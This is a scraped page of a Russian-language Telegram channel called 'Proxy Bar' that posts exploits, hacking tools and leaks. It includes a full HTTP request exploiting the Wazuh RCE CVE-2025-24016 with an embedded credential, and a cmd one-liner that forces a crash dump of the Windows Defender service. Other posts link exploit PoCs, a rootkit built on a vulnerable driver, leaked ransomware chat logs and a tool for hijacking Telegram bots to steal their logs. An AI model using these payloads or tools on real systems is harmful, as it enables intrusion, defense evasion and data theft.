Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Кто же такой хакер Bratva ?
*
В рамках специального расследования, в нашу редакцию попала секретная VHS запись.
Проанализировав которую, были установлены следующие лица:
Петер Севера
Петр Левашов
Юрист Насковец
Статисты - кадровые офицеры редакции gaz3ta.ru
🔥25😱7👍3
This media is not supported in your browser
VIEW IN TELEGRAM
22летняя RCE в GameBoy
*
Пора патчить тамагочи !
*
WriteUP
🔥11👍4
CVE-2024-12754 AnyDesk
*
wtf
*
LPE poc exploit
👍11😱4
Лидеры среди Telegram-каналов по кибербезопасности
*
полный рейтинг 450 каналов со ссылками

😎
🔥15😱6👍2
EDR dump (for fun разумеется)

cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"
👍14🔥9
Sunder
*
Это Windows Rootkit на основе Fudmodule Rootkit от Lazarus Group. Ссылка на эту версию Sunder для примера эксплойта драйвера Appid.sys
Уязвимый драйвер Сандера в этой репе GitHub является драйвер Dell dbutil_2_3.sys ( драйвер заблокирован Microsoft).
Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit
👍12🔥5😱4
опа
😱129👍25🔥5
Извините))))
🔥71👍12😱6
onliner
curl -s https://URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u
👍25😱7
CVE-2025-0108 Palo Alto Networks PAN-OS
*
POC exploit
🔥15😱11👍3
Вот вам и лол
*
LOLC2
👍32🔥11😱7
BlackBasta Chat Logs
*
У ransomВарщиков протек matrix сервак
🔥23
This media is not supported in your browser
VIEW IN TELEGRAM
Украсть у Бота !
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (ID рано или поздно всплывет, или набрутят или etc).
Но ладно если просто антирекламный бот в открытом чате, а если это Ransom BOT или LOGS BOT
или Zabbix BOT лол да)))
Телега давно у черношляпников как C&C сервер используется.
Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой сладкий шекель.
*
Ну так вот, тут один threat hunter имел неосторожность написать софтину, которая автоматизирует большую часть процесса, ты только парсить логи успевай !
*
В ролике все наглядно
*
DownLoad Thы soft (x_)

#telegram #steal #bots #logs
🔥42😱16👍6
CVE-2025-24016
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1

POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
🔥27😱5👍2
Reverse Engineering Malware Rolling XOR (arm64)
*
Video
👍27😱5🔥1
CVE-2025–27364
*
MITRE Caldera Security Advisory — Remote Code Execution
*
POC
🔥12👍5
Традиционно выражаю спасибо yashechka
Спасибо !
🔥53👍9😱6
Ну и в догонку релиз от красноволосой Лизы
*
key_grab
🔥15👍5
iDRAC to Domain Admin
*
Забавная статья
👍21🔥5